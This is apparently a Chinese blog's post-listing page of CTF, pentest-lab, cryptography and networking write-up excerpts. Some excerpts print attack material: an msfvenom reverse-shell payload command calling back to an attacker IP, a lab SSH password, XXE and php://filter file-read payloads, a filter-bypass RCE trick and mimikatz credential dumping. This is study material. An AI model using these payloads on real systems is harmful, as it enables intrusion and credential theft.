自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(80)
  • 收藏
  • 关注

原创 【局域网】VRRP双主导致业务中断原因分析

前情提要:当前局域网核心交换机sw2和sw3采用VRRP组网方式,sw1与sw5在不同区域无连接关系,其中sw4下接业务1为20网段,业务2为30网段。后来发现由于误将sw1与sw5贯通后,导致网络拓扑发生变化,stp重新计算,将sw5计算为根桥(正常情况下,sw2为根桥),则阻塞了可能形成环路的端口sw3的0/1端口,导致业务1中断。那么为什么sw3的0/1端口被阻塞了呢?后经检查配置发现,在sw1配置允许放行的vlan时,未允许业务1网段通过(因为本来无此业务需求),因此在重新计算根桥后,业务1中断。

2024-05-08 19:41:43 431

原创 【数据网故障分析】LDP与BGP中断情况分析

由于OSPF中LOOPBACK0地址使能在哪个接口,对应接口的LOOPBACK0路由优先级最高,LDP(lsr-id为loopback地址)、BGP(peer +ip +c l 0)的会话通过双方LOOPBACK0地址建立因此,在正常通信中,均以汇聚A为主,当明珠站转发故障发生时,OSPF未中断,因此未重新学习路由,因此没有选择从核心绕过,LDP、BGP协商报文路径如下图所示,报文出入方向不一致,导致业务中断。B类厂站(与汇聚C汇聚ldp、bgp中断但104业务未中断),环回口使能在AREA3区域。

2024-03-20 11:53:21 336

原创 【电网】VPN-TARGET配置错误导致业务中断的分析与跨域策略优化

跨域策略优化

2024-03-11 12:36:36 625

原创 【代码审计】buu_[GWCTF 2019]mypassword

1.页面打开像是注入,现注册登录后发现并非注入,如下:2.在登陆界面发现./js/login.js,打开查看到如下的js代码:代码解读:代码会把cookie中的username和password填进当前表单思路:由于是后端执行js,所以构造js即可。先写一个有表单的页面,调用这个js文件,cookie中的数据被填入表单,再用js获取页面表单内容,发送请求,就能得到管理员cookie。现在看在哪里以及如何发送请求。3.由于在各页面查看源码,在首页发现feedback.php:打开其源码可看到注释:代码分

2022-06-09 15:12:32 560 1

原创 【流量分析】buu_[安洵杯 2019]Attack

1.打开流量包,在分组字节流搜索flag,发现一个zip包,使用foremost分离,打开发现需要密码。2.回想起在流量包里面有这样的内容:猜测密码是管理员的(后来发现提示了)3.导出对象->HTTP中发现了一个dmp文件,一般是数据库备份文件的后缀,由于他大小比其他的都大,于是导出看看4.此刻想到mimikatz的功能:在内网渗透中能从内存中抓到明文密码。5.首先将mimikatz设为可信任,绕过防火墙,再右键使用管理员登录即可找到密码。用该密码打开压缩包获取flag...

2022-06-09 10:00:43 577

原创 【python爬虫】aiohttp模块的异步协程代码模板

aiohttp模块的使用:import aiohttpimport asynciourls = [ "", "", ""]async def download(url): name = url.rsplit("/",1)[1] #发送请求 async with aiohttp.ClientSession() as session: async with session.get(url) as resp:

2022-03-08 20:08:31 640

原创 【python爬虫】js逆向分析及AES解密

js逆向

2022-03-06 01:38:22 3309 2

原创 【RPA自动化】selenium教程_元素定位及表格读取

1.下载selenium浏览器驱动,将msedgedriver.exe文件放入Python的安装路径下。edge下载路径:Microsoft Edge Driver - Microsoft Edge Developer注:selenuim原写法:find_element_by_*已被废弃现先导入fromselenium.webdriver.common.by import By,写为:driver.find_element(By.ID,'kw').send_keys2.xpath.

2022-02-28 17:03:04 1746

原创 【交换机】华为及H3C交换机配置vlan及故障处理

为防止攻击者仿造BPDU报文导致边缘端口属性变成非边缘端口,可通过执行命令stp bpdu-protection配置交换设备的BPDU保护功能

2022-01-21 11:13:45 6904

原创 【反序列化】md5_tricks反序列化INF绕过

1.代码审计,发现首先要进行强比较的md5绕过,然后传入mytest的反向序列化参数:2.构造inf绕过,INF的数据类型是float:<?phpclass myjob{ public $test1; public $test2;}$c=new myjob;}echo serialize($c);//O:5:"myjob":2:{s:5:"test1";d:INF;s:5:"test2";d:INF;}3.post传参绕过md5:param1=%.

2021-11-14 17:58:30 2487

原创 【代码审计】伪协议读取+文件名注入漏洞

1.输入register.php注册账号进行登录,发现url传参,尝试使用伪协议读取user.php:2.继续读取function.php:3.发现存在ffffllllaaaaggg,伪协议读取会被重定向到hacker.php,代码审计发现这里存在parse_url漏洞,在user.php前面多加一个/就能使之返回false,从而读取文件:4. 继续读取m4aaannngggeee,解码后访问templates/upload.html:5.发现上传点,但是无法上传,尝试...

2021-11-14 16:45:59 658 1

原创 【反序列化】ReadlezPHP

1.打开网页,无法右键查看源代码,在url中输入view-source查看:2. 进入time.php?source查看到反序列化函数:3.可以读取到echo的结果是$b($a),构造序列化函数:<?phpclass HelloPhp{ public $a; public $b; public function __construct(){ $this->a = 'phpinfo()'; $this->b .

2021-11-14 15:14:06 230

原创 【代码审计】伪协议读取源码+正则绕过命令执行

1.首先打开页面查看源代码:这里是一个简单的文件包含,使用伪协议进行读取:?file=php://filter/convert.base64-encode/resource=mybackdoor.php2.进行解码后读取到mybackdoor.php的源码,本题比较简单,主要学习两种正则绕过方式:<?phperror_reporting(0);function blacklist($cmd){ $filter = "(\\<|\\>|Fl4g|php.

2021-10-21 09:36:14 699

原创 【CTF_流量日志分析】来看看这段日志_提取日志中base64部分解码

1.打开日志文件url解码进行观察,很明晰那传输的一段base64编码,随意解码一条发现为:var_dump(ord(file_get_contents('maybeinthisfile.php')[55])==90)猜测是在进行位数判断。并且状态码多为216,猜测当状态码为215时,为正确的flag:2. 写一个脚本取出其中状态码为215的base64编码字符串进行解码:import base64from urllib2 import *f=open('seescess.log'

2021-10-16 09:23:32 1432

原创 【密码学】换表的base64+切割补位

1.题目:import stringimport rekeys = string.digits + '+/' + string.ascii_lowercase + string.ascii_uppercasedef encrypt(code): st = re.findall('.{3}', code) st.append(code[(len(st) * 3):]) bins = '' for s in st: for i in s:

2021-10-16 09:23:23 666

原创 【CTF_流量日志分析】二分法盲注分析

1.打开日志文件发现又是一道二分法盲注流量,观察任意几条:分析过程:当状态码位200的时候,表示正确,报错为404,所以第21位大于101正确,大于102报错,所以正确字符为101,所以盲注出来的字符串应该是状态码等于200时的字符或等于404时的ascii码减去12.根据以上分析写出脚本:import urllib.parseimport requests,ref = open('日志里的秘密.log','r',encoding='gb18030',errors='ignore

2021-10-16 09:23:11 1769 1

原创 【CTF_流量日志分析】sleep函数的二分法的盲注日志分析

1.分析日志找到进行盲注判断的位置进行分析:分析过程 :拿一条举例,该语句表述当判断当第22位的ascii码大于100时,将延迟1秒,所以将继续进行二分法的拆分,根据大于102和101时没有延时说明小于101,此时判断是否等于101,因此101的ascii对应的应该是盲注判断出来的字符串。2.根据以上分析,可以手动提取不等于的ascii码进行字符串转换也可以写脚本:import urllib.parseimport requests,ref = open('紧急网络安全事件.lo

2021-10-16 09:23:00 2205

原创 【代码审计】buu_[GWCTF 2019]枯燥的抽奖

1.根据提示出前十位的号码,猜测应该需要爆破后面十位,抓包发现发送到check.php:2.跟进查看代码:原理:因为代码中是通过种子seed生成了随机数,但是mt_srand()这个函数存在漏洞,php中mt_rand()生成的是一个伪随机数,是通过算法生成出来的,可以根据这个来进行爆破得到mt_srand()里的种子3.将给出前十个密码解析成php_mt_seed需要的参数,伪随机数生成脚本:str1 ='Xisiab1m0D'str2 = "abcdefghijklmnopq

2021-10-12 11:06:38 1265

原创 【cookie注入】buu_[BSidesCF 2019]Kookie

1.根据提示使用admin进行任意密码登录,发现url中以username传参:2.添加一行cookie即可:或者在burp重发器的params中添加:

2021-10-12 09:50:38 208

原创 【代码审计】buu_[极客大挑战 2019]RCE ME

1.代码审计发现需要传入code参数,并且需要绕过数字和字母过滤后的正则:2.首先构造查看phpinfo中所禁用的函数:php -r "echo urlencode(~'phpinfo');"#%8F%97%8F%96%91%99%90使用~取反后的url进行编码时会将其编码为无法识别的字符,再在code传参时再次取反就可以绕过无字母无数字的过滤。http://c1e50a2c-9d42-44ec-8781-ae37a0aa5e7d.node4.buuoj.cn:81/?c

2021-10-11 16:46:35 680

原创 【xxe漏洞】buu_[NCTF2019]True XML cookbook

1.打开网页,一个熟悉的界面,抓包发现Content-Type:为application/xml,存在xxe漏洞:2.读取相关敏感文件proc/net/arp,发现存在一个ip地址:<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE a [ <!ENTITY exp SYSTEM "file:///proc/net/arp"> ]><user><username>&exp;&

2021-10-09 15:53:31 274

原创 【XXE漏洞】buu_[NCTF2019]Fake XML cookbook

[NCTF2019]Fake XML cookbookXXE漏洞学习文章:XXE漏洞学习和利用—[NCTF2019]Fake XML cookbook-布布扣-bubuko.comXXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件和代码,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害。XXE漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。1.抓包发现里面存在一个X

2021-09-11 10:19:28 312

原创 【代码审计】buu_[BJDCTF2020]Easy MD5

1.使用burp抓包重发,在响应包中看到提示,密码框直接输入ffifdyop,百度搜索md5($pass,true),发现这是一个万能密码ffifdyop,绕过:"select * from 'admin' where password='".md5($pass,true)."'"原因:当raw项为true时,数据库会把16进制转为ascii解释,返回的这个原始二进制,不是普通的二进制(0,1),而是'or’6\xc9]\x99\xe9!r,\xf9\xedb\x1c这种。or后面的句..

2021-09-11 09:43:25 152

原创 【漏洞复现】CVE-2021-3129_laravel远程代码执行漏洞_写入木马getshell

1.

2021-09-09 18:01:22 2295 1

原创 【逆向工程】入门的安卓逆向题_md5加密的apk逆向分析

1.使用模拟器打开,发现是个文本框需要进行字符串的输入。2.用jeb3打开apk,找到main函数,tab进入这个类3.找到oncreate函数:可以看到v5是从文本框里面读取的数据,经过了check_flag函数,就是flag的值,所以现在我们要去check_flag函数中进行分析:4.双击check_flag,这里我们发现首先截取了输入字符串的0-24位进行判断,是否和"DFEAD72E98735A63DAFC2475"相同,然后再取24到后面的位数进行md5加密之后,使用toUpp

2021-09-09 17:48:20 486

原创 【密码学RSA】河北省大学生网络与信息安全选拔赛_easyrsa

1.题目:n=225611725366776485597876049595231950721792594090103144522722754953639687556576591387422485528945955293822309222411406565498432033058264735714456038347577872557368980964061532315394207406066179935181223179694101780447485678671223897630008730352737

2021-09-08 11:09:56 222

原创 【密码学RSA】四川省网络与信息安全职业技能竞赛_hardEquation

1.题目:n=245839054736640464645406042318495686421943967286817543414273026219628291927967348457358491423703717720914843100869765162762575141959004025771592624832258779477205884894234636098652341003718622962462186249746404941765537879818999167982053022164830

2021-09-08 09:43:01 366

原创 【密码学RSA】DASCRF八月挑战赛_let‘s play rsa

1.nc连接:nc node4.buuoj.cn 299832.查看题目给的加密脚本,进行分析:from sympy import isprime,nextprimefrom Crypto.Util.number import getPrime as getprime ,long_to_bytes,bytes_to_long,inverseflag='flag{***************}'def play(): p=getprime(1024) q=g.

2021-09-08 08:51:26 408

原创 【密码学RSA】DASCRF八月挑战赛_ezRSA

1.nc远程连接:nc node4.buuoj.cn 298312.查看task:from secret import flagfrom Crypto.Util.number import *from random import getrandbitsfrom hashlib import sha256class EzRsa: def __init__(self): self.E = 0x10001 self.P = getPrime(

2021-09-07 17:43:05 712 1

原创 【密码学RSA】2020巅峰极客_tryrsa解题过程及原理的详细分析

1.题目:from secret import e1,e2,flagfrom Crypto.Util.number import *msg = bytes_to_long("=========Hint:e1="+str(3)+"=============")p = getPrime(512)q = getPrime(512)N = p*qprint (N)print (pow(msg,3,N))msg = bytes_to_long(flag)p = getPrime(1024

2021-09-07 17:42:12 1616

原创 【密码学RSA】2021四川省信息与网络安全赛_cr4ck费马小定理推导求解共有公约数p

1.题目:import osfrom Crypto.Util import numberwith open('../secret/flag', 'rb') as f: flag = f.read() assert(len(flag) < 200)p = number.getPrime(1024)q = number.getPrime(1024)n = p * qe = 65537data = number.bytes_to_long("JDSE")flag

2021-09-07 16:10:50 405

原创 【密码学RSA】共模攻击原理详解_已知e1*e2的共模攻击题

本题需要了解共模攻击推导过程及原理:1.共模攻击原理共模攻击即用两个及以上的公钥(n,e)来加密同一条信息m已知有密文:c1 = pow(m, e1, n)c2 = pow(m, e2, n)条件:当e1,e2互质,则有gcd(e1,e2)=1根据扩展欧几里德算法,对于不完全为 0 的整数 a,b,gcd(a,b)表示 a,b 的最大公约数。那么一定存在整数 x,y 使得 gcd(a,b)=ax+by所以得到:e1*s1+e2*s2 = 1因为e1和e2为正整数,所以s1、s2皆

2021-09-07 16:00:46 11435

原创 【密码学RSA】共模攻击+维纳攻击+进制转换的低指数广播攻击+dp,dq已知+n为p的r次方的脚本

1.共模攻击:import gmpy2from Crypto.Util.number import *def Commodulus(e1, e2, n, c1, c2): g, s, t = gmpy2.gcdext(e1, e2) #g=e1*s+t*e2 m = gmpy2.powmod(c1, s, n) * gmpy2.powmod(c2, t, n) % n #幂取模,结果是 x = (c^t) mod n print(long_to_bytes(m))

2021-09-07 09:48:54 1730

原创 【密码学RSA】互求最大公约数得到p

1.题目给出了n,c,e:n1:19869526284752088148939972354773627021440824533894698351471306514507074380861900899337746265984127203745503431163626292927194075402561350642083535708084259061401774944942303487139743123454945186086440751466038047046765032004612150970950

2021-09-07 09:34:30 688

原创 【密码学RSA】rsa_p高位泄露(2021四川省数字创新赛题)

1.题目:from Crypto.Util.number import getPrime, bytes_to_longFLAG = b"flag{}"def enc(m): return pow(m, e, N)if __name__ == "__main__": l = 256 p = getPrime(1024) N = p * getPrime(1024) e = 65537 a = (p >> l) <<

2021-09-07 09:21:27 3147 2

原创 【渗透测试】Lin.Security靶机渗透练习_虚拟机无法获取ip的配置方法+靶机多种提权方式练习

靶机描述:在in.security,我们希望开发一个Linux虚拟机,该虚拟机在编写本文时基于最新的Ubuntu发行版(18.04 LTS),但存在许多漏洞,这些漏洞使用户无法升级扎根在盒子上。旨在帮助理解某些内置应用程序和服务(如果配置错误)可能会被攻击者滥用。首先,您可以使用以下凭据登录主机:bob / secret下载地址:https://in.security/downloads/lin.security_v1.0.ova环境配置:1.因为直接开机的security靶机NAT连接,无法

2021-09-06 23:14:04 1478

原创 【渗透测试】SolidState靶机渗透练习_rbash逃逸+4555端口james服务漏洞

一、信息收集:arp-scan -lnmap -sS -sV -T5 -p- 192.168.225.190dirb http://192.168.225.190 //无有效目录2.根据端口扫描信息,可以看到开放了邮件接收pop3服务,4555端口开放的是james-admin服务,进行远程查看:telnet 192.168.225.190 4555 //使用root root密码进行登录help //查看指令listusers //列用户名setpassword mindy

2021-09-03 14:32:33 719

原创 【渗透测试】ew代理三层靶机穿透+proxifier配置规则

1.远程连接:ssh yansiyu@10.177.228.176W6WEwrqD2.msf生成木马:cd /usr/share/metasploit-framework./msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.177.228.128 LPORT=1234 -f elf > /home/load.elf3.上传木马payload.elf文件到一层靶机:scp -p load.elf yansiyu@

2021-09-02 23:09:12 2726

原创 【渗透测试】phpmyadmin一句话写入+socks代理渗透内网+CVE-2021-3493漏洞利用

OFF表示日志关闭C:\phpStudy\MySQL\data\stu1.log为日志绝对路径

2021-09-02 14:59:15 925

原创 【靶机渗透】Mr-Robot靶机渗透练习_nmap提权

1.信息收集三部曲:扫描ip+端口扫描+目录扫描:

2021-09-01 10:58:33 500 2

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除